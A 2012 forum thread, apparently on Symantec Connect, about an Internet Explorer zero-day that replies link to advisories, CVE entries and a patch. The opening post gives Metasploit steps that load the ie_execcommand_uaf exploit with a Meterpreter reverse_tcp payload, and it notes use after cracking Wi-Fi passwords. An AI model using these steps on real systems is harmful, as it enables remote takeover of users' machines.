Video Screencast Help

Vulnerability

Created: 27 Sep 2012 | 7 comments
Fabiano.Pessoa's picture

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Comments 7 CommentsJump to latest comment

.Brian's picture

Add as an article or blog. Thanks for the update. Maybe give a walk thru on how to exploit this. Would be good.

Please click the "Mark as solution" link at bottom left on the post that best answers your question. This will benefit admins looking for a solution to the same problem.

Fabiano.Pessoa's picture

Thanks Brian
I will post on my blog not to miss the warning.
But this is much exploited after Queba password on wifi network

hugs

Fabiano Pessoa

Systems Analyst - Forensic Expert

Chetan Savade's picture

Hi,

Symantec is aware about this vulnerability.

Please go through the following blog to know more about it.

Blog: New Internet Explorer Zero-Day Vulnerability Exploited in the Wild.

https://www-secure.symantec.com/connect/blogs/new-...

Chetan Savade
Sr Technical Support Engineer, Endpoint Security
Enterprise Technical Support
CCNA | CCNP | MCSE | SCTS |

Don't forget to mark your thread as 'SOLVED' with the answer that best helps you.<

cus000's picture

Any CVE number yet?

 

Thanks

Chetan Savade's picture

Hi,

Please go through following links:

http://www.securityfocus.com/bid/55562/

http://technet.microsoft.com/en-us/security/adviso...

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=...

You can always refer these links.

Chetan Savade
Sr Technical Support Engineer, Endpoint Security
Enterprise Technical Support
CCNA | CCNP | MCSE | SCTS |

Don't forget to mark your thread as 'SOLVED' with the answer that best helps you.<

Lionel Payet's picture

Hello, 

Fabiano may refer to the latest 0-Day found in IE the 17th September 2012 and already patched + covered : https://www-secure.symantec.com/connect/blogs/new-internet-explorer-zero-day-vulnerability-exploited-wild

Regards, 

Lionel. 

Mithun Sanghavi's picture

Hello,

Microsoft Internet Explorer Image Arrays Remote Code Execution Vulnerability, a possible zero-day vulnerability in Internet Explorer that is being exploited in the wild. Symantec have confirmed this vulnerability affects versions 9, 8, and 7 of the Internet Explorer browser.

To know more read this Symantec BLOG... http://bit.ly/PNB9vz

Also, Check this Article:

Is my computer protected from the Internet Explorer Zero-Day vulnerability?

http://bit.ly/SqwwDV

Trojan.Swifi is a Trojan horse that may be downloaded from a Web site and exploits a vulnerability in Adobe Flash Player.

http://bit.ly/Uit0jv

Bloodhound.Exploit.474 is a heuristic detection for files attempting to exploit the Microsoft Internet Explorer Image Arrays Remote Code Execution Vulnerability.

http://bit.ly/UgRGWS

Hope that helps!!

Mithun Sanghavi
Senior Consultant
MIM | MCSA | MCTS | STS | SSE | SSE+ | ITIL v3

Don't forget to mark your thread as 'SOLVED' with the answer that best helped you.